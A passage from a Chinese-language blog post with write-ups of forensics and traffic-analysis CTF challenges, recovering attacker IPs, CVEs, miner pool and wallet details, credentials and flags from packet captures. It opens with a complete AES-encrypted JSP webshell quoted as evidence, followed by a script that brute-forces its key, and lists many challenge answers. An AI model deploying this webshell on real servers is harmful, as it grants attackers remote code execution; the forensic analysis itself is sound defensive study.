<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%! String xc=&quot;748007e861908c03&quot;; class X extends ClassLoader&#123;public X(ClassLoader z)&#123;super(z);&#125;public Class Q(byte[] cb)&#123;return super.defineClass(cb, 0, cb.length);&#125; &#125;public byte[] x(byte[] s,boolean m)&#123; try&#123;javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(&quot;AES&quot;);c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),&quot;AES&quot;));return c.doFinal(s); &#125;catch (Exception e)&#123;return null; &#125;&#125;%&gt;&lt;%try&#123;byte[] data=new byte[Integer.parseInt(request.getHeader(&quot;Content-Length&quot;))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))&lt;data.length);data=x(data, false);if (session.getAttribute(&quot;payload&quot;)==null)&#123;session.setAttribute(&quot;payload&quot;,new X(this.getClass().getClassLoader()).Q(data));&#125;else&#123;request.setAttribute(&quot;parameters&quot;, data);Object f=((Class)session.getAttribute(&quot;payload&quot;)).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));&#125; &#125;catch (Exception e)&#123;&#125;%&gt;</span><br></pre></td></tr></table></figure>

<p>解密POST的jsp数据</p>
<p><img   src="/images/blogimg/1706702481879-a8a2cf32-fc78-4f54-a6e1-3f0327c3c75b.png" ></p>
<p>找到最后一个shell.jsp的包，解密即可</p>
<p><img   src="/images/blogimg/1706702488479-9d12efb0-7d36-4b77-af48-1e710b2e618c.png" ></p>
<blockquote>
<p>该webshell的连接密码是多少？<br>14mk3y</p>
</blockquote>
<p>找到倒数第三个jsp流量包，解密发现需要爆破密码</p>
<p><img   src="/images/blogimg/1706702499328-b791fae3-15b8-4d4a-bb02-ad573ee47971.png" ></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">generate_md5</span>(<span class="params">input_string</span>):</span><br><span class="line">    md5 = hashlib.md5()</span><br><span class="line">    md5.update(input_string.encode(<span class="string">&#x27;utf-8&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> md5.hexdigest()</span><br><span class="line"></span><br><span class="line">s = string.ascii_letters + string.digits + string.punctuation</span><br><span class="line"><span class="keyword">for</span> a <span class="keyword">in</span> s:</span><br><span class="line">    <span class="keyword">for</span> b <span class="keyword">in</span> s:</span><br><span class="line">        <span class="keyword">for</span> c <span class="keyword">in</span> s:</span><br><span class="line">            <span class="keyword">for</span> d <span class="keyword">in</span> s:</span><br><span class="line">                <span class="built_in">input</span> = <span class="string">&#x27;1&#x27;</span> + a + b + c + d + <span class="string">&#x27;y&#x27;</span></span><br><span class="line">                <span class="keyword">if</span> generate_md5(<span class="built_in">input</span>)[:<span class="number">16</span>]  == <span class="string">&#x27;748007e861908c03&#x27;</span>:</span><br><span class="line">                    <span class="built_in">print</span>(<span class="built_in">input</span>)</span><br></pre></td></tr></table></figure>

<p><img   src="/images/blogimg/1706702515749-443a37e2-2693-41d0-935e-256a3d967e83.png" ></p>
<h3 id="sevrer-save"><a href="#sevrer-save" class="headerlink" title="sevrer save"></a>sevrer save</h3><blockquote>
<p>黑客是使用什么漏洞来拿下root权限的。格式为：CVE-2020-114514<br>本题附件见于平台公告的SS.zip，解压密码为c77ad47ba4c85fae66f08ec12e0085dd<br>CVE-2022-22965</p>
</blockquote>
<p><img   src="/images/blogimg/1706702542826-5303883b-789f-45d3-b792-a0fc003f1be0.png" ></p>
<p><img   src="/images/blogimg/1706702547317-7b064922-810c-44a1-be6a-64cb0e81c2a2.png" ></p>
<blockquote>
<p>黑客反弹shell的ip和端口是什么，格式为：10.0.0.1:4444<br>192.168.43.128:2333</p>
</blockquote>
<p><img   src="/images/blogimg/1706702560197-d33954ed-7069-4104-a063-0f0007006005.png" ></p>
<blockquote>
<p>黑客的病毒名称是什么？ 格式为：filename<br>main</p>
</blockquote>
<p>&#x2F;home&#x2F;guests目录下面发现可疑文件</p>
<p><img   src="/images/blogimg/1706702574008-ae77f0d4-24dd-4704-a775-bb0002e4a8a8.png" ></p>
<blockquote>
<p>黑客的病毒运行后创建了什么用户？请将回答用户名与密码：username:password<br>ll:123456</p>
</blockquote>
<p>查看&#x2F;etc&#x2F;shadow文件</p>
<p><img   src="/images/blogimg/1706702582745-b2a8f38d-2c78-4db7-b4e9-9361fc974543.png" ></p>
<blockquote>
<p>服务器在被入侵时外网ip是多少? 格式为：10.10.0.1<br>172.105.202.239</p>
</blockquote>
<p>查看log.txt</p>
<p><img   src="/images/blogimg/1706702590445-624fa4d5-5ecf-4d75-aba1-dde22d8a3de3.png" ></p>
<blockquote>
<p>病毒运行后释放了什么文件？格式：文件1,文件2<br>lolMiner,mine_doge.sh</p>
</blockquote>
<p>.idea为main病毒释放的文件</p>
<p><img   src="/images/blogimg/1706702606340-072ceb17-ed3c-4842-8f76-c86898040c1d.png" ></p>
<blockquote>
<p>矿池地址是什么？ 格式：domain:1234<br>doge.millpools.cc:5567</p>
</blockquote>
<p>查看sh文件，可以发现矿池地址和钱包地址</p>
<p><img   src="/images/blogimg/1706702613793-472fe8bb-4dd6-4502-bcab-a697737cc1ce.png" ></p>
<blockquote>
<p>黑客的钱包地址是多少？格式：xx:xxxxxxxx<br>DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9</p>
</blockquote>
<h3 id="Wireshark"><a href="#Wireshark" class="headerlink" title="Wireshark"></a>Wireshark</h3><blockquote>
<p>被入侵主机的IP是？<br>192.168.246.28</p>
</blockquote>
<p><img   src="/images/blogimg/1706702630964-bc6a7be9-1814-414d-803c-17a89d8694ad.png" ></p>
<blockquote>
<p>被入侵主机的口令是？<br>youcannevergetthis</p>
</blockquote>
<p><img   src="/images/blogimg/1706702640527-57ad9ae6-d624-4469-81f6-0726219f4d5d.png" ></p>
<blockquote>
<p>用户目录下第二个文件夹的名称是？<br>Downloads</p>
</blockquote>
<p><img   src="/images/blogimg/1706702646964-eceb4f26-62fe-4c44-b0e9-5625ec702c9e.png" ></p>
<blockquote>
<p>&#x2F;etc&#x2F;passwd中倒数第二个用户的用户名是？<br>mysql</p>
</blockquote>
<p><img   src="/images/blogimg/1706702653879-87ff98c8-5fd8-4d10-9f74-3dbde04fdbec.png" ></p>
<h3 id="SmallSword"><a href="#SmallSword" class="headerlink" title="SmallSword"></a>SmallSword</h3><blockquote>
<p>连接蚁剑的正确密码是__?（答案示例：123asd）<br>6ea280898e404bfabd0ebb702327b19f</p>
</blockquote>
<p><img   src="/images/blogimg/1706702833953-c34a3ce7-2d43-4227-b4f1-8668bfb73e14.png" ></p>
<blockquote>
<p>攻击者留存的值是__?(答案示例：d1c3f0d3-68bb-4d85-a337-fb97cf99ee2e)<br>ad6269b7-3ce2-4ae8-b97f-f259515e7a91</p>
</blockquote>
<p><img   src="/images/blogimg/1706702843484-85d4ebb0-ba6d-4244-80d4-e35267989656.png" ></p>
<p><img   src="/images/blogimg/1706702847668-89d66c34-bbd6-48af-8eb8-05a1fb875994.png" ></p>
<blockquote>
<p>攻击者下载到的flag是__?(答案示例：flag3{uuid})<br>flag{8f0dffac-5801-44a9-bd49-e66192ce4f57}</p>
</blockquote>
<p><img   src="/images/blogimg/1706702855620-005b1c4e-5b9b-4fcd-b7c3-a46fcd60cb25.png" ></p>
<p>文件-&gt;导出对象-&gt;http-&gt;Save All-&gt;保存到文件夹中，info(12)有5m，是上面的exe文件对应的流量，拖入010editor</p>
<p><img   src="/images/blogimg/1706702874392-72852096-7358-4291-bfd7-d24657e9743e.png" ></p>
<p>从第三位开始是<code>4D5A90</code>是<code>EXE</code>文件的头部信息特征,所以我们删除前面三个,将其另存为<code>exe</code>执行</p>
<p><img   src="/images/blogimg/1706702880040-45d10690-d637-4c11-996c-37e3a18b9d16.png" ></p>
<p>看别人的wp写运行之后会生成图片，我的不行，放到微步的沙箱可以生成</p>
<p><img   src="/images/blogimg/1706702886594-bda6ea38-c34e-4209-8e21-f2fca61af104.png" ></p>
<p>爆破宽高</p>
<p><img   src="/images/blogimg/1706702897671-69f3b436-cf11-47e2-a385-c0ccd67650a1.png" ></p>
<p><img   src="/images/blogimg/1706702905758-986ecb5b-e4b4-4303-9168-a99960b98fb9.png" ></p>
<p><img   src="/images/blogimg/1706702910734-f3d481de-efaf-43ce-a609-992b2efd07db.png" ></p>
<p><img   src="/images/blogimg/1706702919743-6d3c40a5-5295-4982-9b98-4dae674825f2.png" ></p>
<h3 id="ez-web"><a href="#ez-web" class="headerlink" title="ez_web"></a>ez_web</h3><blockquote>
<p>服务器自带的后门文件名是什么？（含文件后缀）<br>ViewMore.php</p>
</blockquote>
<p><img   src="/images/blogimg/1706702934817-d45d1558-817d-416a-9510-24dfdf33e40d.png" ></p>
<blockquote>
<p>服务器的内网IP是多少？<br>192.168.101.132</p>
</blockquote>
<p><img   src="/images/blogimg/1706702943361-1652ce9e-baf5-4081-b0dc-77951dd500b6.png" ></p>
<blockquote>
<p>攻击者往服务器中写入的key是什么？<br>7d9ddff2-2d67-4eba-9e48-b91c26c42337</p>
</blockquote>
<p><img   src="/images/blogimg/1706702952034-38bf593d-97df-493b-8bd0-d3a178786ca9.png" ></p>
<p><img   src="/images/blogimg/1706702957565-9765a518-f267-4d8f-9ef5-3b557a02bcb5.png" ></p>
<p>是一个压缩包</p>
<p><img   src="/images/blogimg/1706702974564-a746e058-cf60-43d7-a9a2-f7510acc86ab.png" ></p>
<p>提取压缩包</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> UEsDBBQAAQAAANgDvlTRoSUSMAAAACQAAAAHAAAAa2V5LnR4dGYJZVtgRzdJtOnW1ycl/O/AJ0rmzwNXxqbCRUq2LQid0gO2yXaPBcc9baLIAwnQ71BLAQI/ABQAAQAAANgDvlTRoSUSMAAAACQAAAAHACQAAAAAAAAAIAAAAAAAAABrZXkudHh0CgAgAAAAAAABABgAOg7Zcnlz2AE6DtlyeXPYAfldXhh5c9gBUEsFBgAAAAABAAEAWQAAAFUAAAAAAA== | <span class="built_in">base64</span> -d &gt; a.zip</span><br></pre></td></tr></table></figure>

<p>结合前面的密码</p>
<p><img   src="/images/blogimg/1706702994529-9830f75f-7b7f-4ef0-ae9f-7ae38b8bf1b4.png" ></p>
<p><img   src="/images/blogimg/1706702999654-0f01fa01-42cf-4599-a669-b88426924dab.png" ></p>
<h3 id="tcpdump"><a href="#tcpdump" class="headerlink" title="tcpdump"></a>tcpdump</h3><blockquote>
<p>攻击者通过暴力破解进入了某Wiki 文档，请给出登录的用户名与密码，以:拼接，比如admin:admin<br>TMjpxFGQwD:123457</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http &amp;&amp; !http.request.uri contains &quot;login&quot; &amp;&amp; !tcp contains &quot;用户名或密码错误&quot; &amp;&amp; http.response.code !=404</span><br></pre></td></tr></table></figure>

<p><img   src="/images/blogimg/1706703144845-1483be00-b33e-4a6e-b5c1-f857dc9e49cd.png" ></p>
<blockquote>
<p>攻击者发现软件存在越权漏洞，请给出攻击者越权使用的cookie的内容的md5值。（32位小写）<br>383c74db4e32513daaa1eeb1726d7255</p>
</blockquote>
<p>成功之后的Cookie有<code>accessToken</code>特征，所以搜<code>accessToken</code>，<code>http contains &quot;accessToken&quot;</code></p>
<p><img   src="/images/blogimg/1706703154714-67ec0da2-6acb-444d-8558-cb383c1d2a1a.png" ></p>
<p><img   src="/images/blogimg/1706703175025-b0fc873b-b1e2-4113-a11c-00ef50f58d6e.png" ></p>
<blockquote>
<p>攻击使用jdbc漏洞读取了应用配置文件，给出配置中的数据库账号密码，以:拼接，比如root:123456<br>zyplayer:1234567</p>
</blockquote>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcp <span class="keyword">contains</span> <span class="string">&quot;jdbc:&quot;</span></span><br></pre></td></tr></table></figure>

<p><img   src="/images/blogimg/1706703197592-7d959f7e-4ab3-485d-b190-8a8f634915d6.png" ></p>
<blockquote>
<p>攻击者又使用了CVE漏洞攻击应用，执行系统命令，请给出此CVE编号以及远程EXP的文件名，使用:拼接，比如CVE-2020-19817:exp.so<br>CVE-2022-21724:custom.dtd.xml</p>
</blockquote>
<p><img   src="/images/blogimg/1706703204743-8148a087-7d28-4109-ba6e-babebcc2f383.png" ></p>
<p>复现的文章里面上传了一个xml文件，搜索xml</p>
<p><img   src="/images/blogimg/1706703210817-ada8bc00-c5e1-422b-a882-020d33a4f28f.png" ></p>
<blockquote>
<p>给出攻击者获取系统权限后，下载的工具的名称，比如nmap<br>fscan</p>
</blockquote>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcp.port <span class="operator">=</span><span class="operator">=</span> <span class="number">9999</span></span><br></pre></td></tr></table></figure>

<p><img   src="/images/blogimg/1706703225661-023e8bc8-6ada-4a8c-957d-27f1837be577.png" ></p>
<h3 id="hacked"><a href="#hacked" class="headerlink" title="hacked"></a>hacked</h3><blockquote>
<p>admIn用户的密码是什么？<br>flag{WelC0m5_TO_H3re}</p>
</blockquote>
<p>比较前面的数据包可以发现key和iv</p>
<p><img   src="/images/blogimg/1706703244498-19ec00df-bdab-4316-b5ce-90ca52d7bcb0.png" ></p>
<p><img   src="/images/blogimg/1706703252303-8b339ef9-732e-44f0-9968-19c57f1ac293.png" ></p>
<blockquote>
<p>app.config[‘SECRET_KEY’]值为多少？<br>ssti_flask_hsfvaldb</p>
</blockquote>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcp <span class="keyword">contains</span> <span class="string">&quot;KEY&quot;</span></span><br></pre></td></tr></table></figure>

<p><img   src="/images/blogimg/1706703259335-89e9d386-0df3-4200-b6da-9451f6a05450.png" ></p>
<blockquote>
<p>flask网站由哪个用户启动？<br>red</p>
</blockquote>
<p>通过session进行的rce</p>
<p><img   src="/images/blogimg/1706703275522-526b7853-41ec-474d-bb5a-f3b31eb1cca7.png" ></p>
<blockquote>
<p>攻击者写入的内存马的路由名叫什么？（答案里不需要加&#x2F;）<br>Index</p>
</blockquote>
<p>翻来翻去只有Index这个路由比较可疑，拿去解密之后也证实是这个路由</p>
<p><img   src="/images/blogimg/1706703281489-091416f8-08e8-478d-90d2-b883921a4170.png" ></p>

                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">流量分析</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/%E5%8F%96%E8%AF%81/">取证</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2024/06/20/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Initial/"
                                   title="春秋云镜-Initial"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">春秋云镜-Initial</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2024/06/19/FIC/"
                                   title="第四届FIC取证竞赛"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">第四届FIC取证竞赛</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#IncidentResponse"><span class="nav-text">IncidentResponse</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#baby-forensics"><span class="nav-text">baby_forensics</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="nav-text">方法一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="nav-text">方法二</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80-1"><span class="nav-text">方法一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C-1"><span class="nav-text">方法二</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hard-web"><span class="nav-text">hard_web</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sevrer-save"><span class="nav-text">sevrer save</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Wireshark"><span class="nav-text">Wireshark</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SmallSword"><span class="nav-text">SmallSword</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ez-web"><span class="nav-text">ez_web</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tcpdump"><span class="nav-text">tcpdump</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hacked"><span class="nav-text">hacked</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
        &copy;&nbsp;<span>2023</span>&nbsp;-&nbsp;2024
        
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">cvbxy</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#IncidentResponse"><span class="nav-text">IncidentResponse</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#baby-forensics"><span class="nav-text">baby_forensics</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="nav-text">方法一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="nav-text">方法二</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80-1"><span class="nav-text">方法一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C-1"><span class="nav-text">方法二</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hard-web"><span class="nav-text">hard_web</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sevrer-save"><span class="nav-text">sevrer save</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Wireshark"><span class="nav-text">Wireshark</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SmallSword"><span class="nav-text">SmallSword</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ez-web"><span class="nav-text">ez_web</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tcpdump"><span class="nav-text">tcpdump</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hacked"><span class="nav-text">hacked</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
